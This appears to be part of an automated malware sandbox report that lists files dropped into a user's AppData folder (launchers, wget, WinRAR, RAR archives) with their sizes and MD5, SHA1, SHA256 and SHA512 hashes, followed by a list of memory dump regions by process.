42c9ef8bb9849a1836a07c00b0c26582

SHA1
b16e9be42b813a0ab8af138c498847771e92f024

SHA256
ce54e17740be544116e9979717ae6b26e8943b00549efdad5af6d6ce9a955524

SHA512
33dc118eee87779a443c110df5b78145844b5b4aefd73503ae7625524fe29e13f43259afd7f5b3789619e1ee93cef3dafe6fcbcc6d00b1120800b549d44ab7f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5ej2h53.iwl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

Filesize
12B

MD5
2189134129f28b00fe519c71c97d50d4

SHA1
0e906542fcad693c7b5e342d4e50784b82148b5c

SHA256
3a76bbe2d55c9eb12caee37ab449e8ca54b26defee7696e5fa59388f5f180f1f

SHA512
06d86267d30239484f3aace82e3c1ad2be301fef221b7e8b16acfd086ed9a485e72e78695b2e79b3b01cb6bb2acf12f6fa4e0c56d26243a1f38c9dbf97f39f71

Download Submit
C:\Users\Admin\AppData\Roaming\services\0127871.rar

Filesize
2.9MB

MD5
3ba7655d55f35256e14307d9ab7f560c

SHA1
b5d14e76f894b643860e69f5a2d9308d4b0c1fcb

SHA256
262bc2b98e4579e3c97376b9f8b7c12f56b0cc75519914057a44b8fc580ded6c

SHA512
a73cda3b1d2cbb1cd7f320ee8b31659d2890a958392ef2ce83eacd320357d095680e160bc25efecd82726d541ce38bdc623a4ee75301fbe76e58b96aaab8dc2b

Download Submit
C:\Users\Admin\AppData\Roaming\services\02plugins23208.rar

Filesize
9.6MB

MD5
557b45a8dfe391ada925b428815343a7

SHA1
4cee18d01e3a1e3dfbce90a38b9f2687bdb73e90

SHA256
da6879957bd50c9fb45a0bed227f521f2398f65dc1a31904a494ec764d3759d3

SHA512
42efc37605923263fa5a215c645e56fcc998c4ee5a24e3086911e23ba55f90162ec3be5f908e0ac065c697bd5d3dc4aceb460fa4aa19cea9999db2708ba75bbd

Download Submit
C:\Users\Admin\AppData\Roaming\services\03plugins10863.rar

Filesize
2.9MB

MD5
e8891a8b9d48c36ace38613a3ee58e65

SHA1
45b5010846dc9386c57f6a0f3715af951683b0be

SHA256
64cb56c7af6ec8628a343e0e1d47e52f9353aae5835f243d177577d7a3ccd05c

SHA512
9ec8424ba8d8773d581dd95dc4f70ad9ed529e4640f6061ad8a668966124ee39d734466bf14210d71afdd773c98302e490a47ac89dde1fa6ad1981baf00aa0a4

Download Submit
C:\Users\Admin\AppData\Roaming\services\1\rhjryjyj.exe

Filesize
467KB

MD5
ab2d2914e268ac8754e408bdd6c109cd

SHA1
936a1529158b699ebfaf97e937f17936d321920c

SHA256
0f5978c1e5026feea6e28485ceb99b48105d73a77517faf40c1e57d638a5cdd4

SHA512
c421cb6c41640e1866b891c941151903ad51e04a437b6d90faa6c732f2e98ef4172631453f9a60dcd8c0e4ffd39ec8c13277961c06a4119b10aff91037318fcf

Download Submit
C:\Users\Admin\AppData\Roaming\services\2plugin27724

Filesize
7.2MB

MD5
59dd26d0a0781afb903b222a340a135a

SHA1
dc7eb315e84f9e828376d5421108685d997099aa

SHA256
d782048432be8fe4ce0fbcaaf54724202ac39a293c2a6ae5cda2c7f04aa2c967

SHA512
e4baf948f1023fc04aa9344ed0bde468566a429c4807f584204a6de95113de78dd2faaedad56e064f3023510fe774386a844becd0f9453d53884e31d4b345ed1

Download Submit
C:\Users\Admin\AppData\Roaming\services\3plugin29563

Filesize
399KB

MD5
5886235e78709ba971a3b4cdfdc336ee

SHA1
856e9688e3e087489d6d4ef02b7317d3cbc1fff7

SHA256
059701aa60117a1adc3c7fbaed00f05e72c97b28bcbd2456805dd6531654d970

SHA512
0699b612c13187f89e71b0008221dddab30c3adaef353c21b40fda72f2487eea874f2475f6e9a9a5a23855f20548dae537fa97fcbeabfc1f266f5219dacdb244

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

Filesize
3KB

MD5
6cced0a38b185030835bf8857633c159

SHA1
4f1604d5e67894fb6b054f8ac82122fa8ad69ed6

SHA256
f15ae3d7b9d5310f53939148cf8fe58c8078086e934628ad2c3a611a59181e36

SHA512
576c4e937b13050ca408445242db266e43c02dc1ec8ea567994594bd624c276bb20c46b94cf54cfe1ac36091bb4cf9959df1403b4838ab15fa10c75f119e18cc

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

Filesize
364KB

MD5
e5c00b0bc45281666afd14eef04252b2

SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758

SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903

SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

Download Submit
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

Filesize
1KB

MD5
f0fc065f7fd974b42093594a58a4baef

SHA1
dbf28dd15d4aa338014c9e508a880e893c548d00

SHA256
d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693

SHA512
8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

Filesize
6KB

MD5
6e7b8b4200d14198c2a6c2c7617a78db

SHA1
b4d87db35a6cb1630a78e50939317f7c68a5303d

SHA256
91436d2eb99775eef9b6e543c089794f851d750924d3aaede3627623fd0a7f2e

SHA512
72aaa8307509aa26782e3954511f0d6306c9cffce312566b91036f173cd763f2d621f907cc3646cb0c0881ef066b7ec10d784eeb4c47c732812bb3eb3ddeb99d

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

Filesize
364KB

MD5
93fde4e38a84c83af842f73b176ab8dc

SHA1
e8c55cc160a0a94e404f544b22e38511b9d71da8

SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

SHA512
48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec

Download Submit
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

Filesize
1KB

MD5
1b6de83d3f1ccabf195a98a2972c366a

SHA1
09f03658306c4078b75fa648d763df9cddd62f23

SHA256
e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724

SHA512
e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

Download Submit
C:\Users\Admin\AppData\Roaming\services\wget.exe

Filesize
4.9MB

MD5
8c04808e4ba12cb793cf661fbbf6c2a0

SHA1
bdfdb50c5f251628c332042f85e8dd8cf5f650e3

SHA256
a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

SHA512
9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

Download Submit
C:\Users\Admin\AppData\Roaming\services\winrar.exe

Filesize
2.1MB

MD5
f59f4f7bea12dd7c8d44f0a717c21c8e

SHA1
17629ccb3bd555b72a4432876145707613100b3e

SHA256
f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

SHA512
44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

Download Submit
memory/776-123-0x00007FFF62980000-0x00007FFF62982000-memory.dmp

Filesize
8KB

Download
memory/776-122-0x00007FFF62970000-0x00007FFF62972000-memory.dmp

Filesize
8KB

Download
memory/776-125-0x0000000140000000-0x0000000140E3D000-memory.dmp

Filesize
14.2MB

Download
memory/824-236-0x0000000000400000-0x000000000046F000-memory.dmp

Filesize
444KB

Download
memory/848-109-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/848-112-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/1092-148-0x0000000000400000-0x000000000046F000-memory.dmp

Filesize
444KB

Download
memory/1660-213-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1660-214-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1660-217-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1660-210-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1660-211-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1660-212-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1968-58-0x0000000006C40000-0x0000000006C72000-memory.dmp

Filesize
200KB

Download
memory/1968-77-0x0000000007240000-0x0000000007248000-memory.dmp

Filesize
32KB

Download
memory/1968-76-0x0000000007250000-0x000000000726A000-memory.dmp

Filesize
104KB

Download
memory/1968-75-0x0000000007210000-0x0000000007224000-memory.dmp

Filesize
80KB

Download
memory/1968-74-0x0000000007200000-0x000000000720E000-memory.dmp

Filesize
56KB

Download
memory/1968-73-0x00000000071D0000-0x00000000071E1000-memory.dmp

Filesize
68KB

Download
memory/1968-72-0x0000000007040000-0x000000000704A000-memory.dmp

Filesize
40KB

Download
memory/1968-71-0x0000000007620000-0x0000000007C9A000-memory.dmp

Filesize
6.5MB

Download
memory/1968-70-0x0000000006E80000-0x0000000006F23000-memory.dmp

Filesize
652KB

Download
memory/1968-69-0x0000000006C00000-0x0000000006C1E000-memory.dmp

Filesize
120KB

Download
memory/1968-59-0x000000006FDF0000-0x000000006FE3C000-memory.dmp

Filesize
304KB

Download
memory/2704-108-0x0000000000400000-0x000000000047E000-memory.dmp

Filesize
504KB

Download
memory/2704-101-0x0000000077650000-0x0000000077865000-memory.dmp

Filesize
2.1MB

Download
memory/2704-99-0x00007FFF62770000-0x00007FFF62965000-memory.dmp

Filesize
2.0MB

Download
memory/2704-98-0x0000000003090000-0x0000000003490000-memory.dmp

Filesize
4.0MB

Download
memory/2704-97-0x0000000003090000-0x0000000003490000-memory.dmp

Filesize
4.0MB

Download
memory/3056-175-0x0000024C7BAF0000-0x0000024C7BAFA000-memory.dmp

Filesize
40KB

Download
memory/3056-174-0x0000024C7BAE0000-0x0000024C7BAE8000-memory.dmp

Filesize
32KB

Download
memory/3056-173-0x0000024C7B970000-0x0000024C7B97A000-memory.dmp

Filesize
40KB

Download
memory/3056-172-0x0000024C7B980000-0x0000024C7B99C000-memory.dmp

Filesize
112KB

Download
memory/3056-160-0x0000024C7B6F0000-0x0000024C7B712000-memory.dmp

Filesize
136KB

Download
memory/3740-128-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/3756-221-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-224-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-226-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-225-0x000002CB144A0000-0x000002CB144C0000-memory.dmp

Filesize
128KB

Download
memory/3756-229-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-220-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-223-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-219-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-222-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-228-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-218-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-227-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-230-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-238-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3756-239-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/3764-184-0x0000000140000000-0x0000000140E3D000-memory.dmp

Filesize
14.2MB

Download
memory/4008-85-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/4332-38-0x0000000006500000-0x000000000654C000-memory.dmp

Filesize
304KB

Download
memory/4332-81-0x00000000734B0000-0x0000000073C60000-memory.dmp

Filesize
7.7MB

Download
memory/4332-36-0x0000000005E70000-0x00000000061C4000-memory.dmp

Filesize
3.3MB

Download
memory/4332-20-0x00000000734BE000-0x00000000734BF000-memory.dmp

Filesize
4KB

Download
memory/4332-39-0x0000000007630000-0x00000000076C6000-memory.dmp

Filesize
600KB

Download
memory/4332-26-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/4332-25-0x0000000005D90000-0x0000000005DF6000-memory.dmp

Filesize
408KB

Download
memory/4332-24-0x0000000005CE0000-0x0000000005D02000-memory.dmp

Filesize
136KB

Download
memory/4332-23-0x0000000005670000-0x0000000005C98000-memory.dmp

Filesize
6.2MB

Download
memory/4332-22-0x00000000734B0000-0x0000000073C60000-memory.dmp

Filesize
7.7MB

Download
memory/4332-21-0x0000000004EB0000-0x0000000004EE6000-memory.dmp

Filesize
216KB

Download
memory/4332-37-0x0000000006470000-0x000000000648E000-memory.dmp

Filesize
120KB

Download
memory/4332-82-0x00000000734B0000-0x0000000073C60000-memory.dmp

Filesize
7.7MB

Download
memory/4332-80-0x00000000734BE000-0x00000000734BF000-memory.dmp

Filesize
4KB

Download
memory/4332-42-0x0000000007CD0000-0x0000000008274000-memory.dmp

Filesize
5.6MB

Download
memory/4332-40-0x0000000006980000-0x000000000699A000-memory.dmp

Filesize
104KB

Download
memory/4332-41-0x00000000069D0000-0x00000000069F2000-memory.dmp

Filesize
136KB

Download
memory/4336-203-0x000002985BDB0000-0x000002985BDCC000-memory.dmp

Filesize
112KB

Download
memory/4336-204-0x000002985BDD0000-0x000002985BE85000-memory.dmp

Filesize
724KB

Download
memory/4336-205-0x000002985BE90000-0x000002985BE9A000-memory.dmp

Filesize
40KB

Download
memory/4336-207-0x000002985C020000-0x000002985C026000-memory.dmp

Filesize
24KB

Download
memory/4336-206-0x000002985C040000-0x000002985C05A000-memory.dmp

Filesize
104KB

Download
memory/4852-150-0x0000000000400000-0x000000000046F000-memory.dmp

Filesize
444KB

Download
memory/5080-102-0x0000000000E90000-0x0000000000E99000-memory.dmp

Filesize
36KB

Download
memory/5080-107-0x0000000077650000-0x0000000077865000-memory.dmp

Filesize
2.1MB

Download
memory/5080-105-0x00007FFF62770000-0x00007FFF62965000-memory.dmp

Filesize
2.0MB

Download
memory/5080-104-0x00000000029F0000-0x0000000002DF0000-memory.dmp

Filesize
4.0MB

Download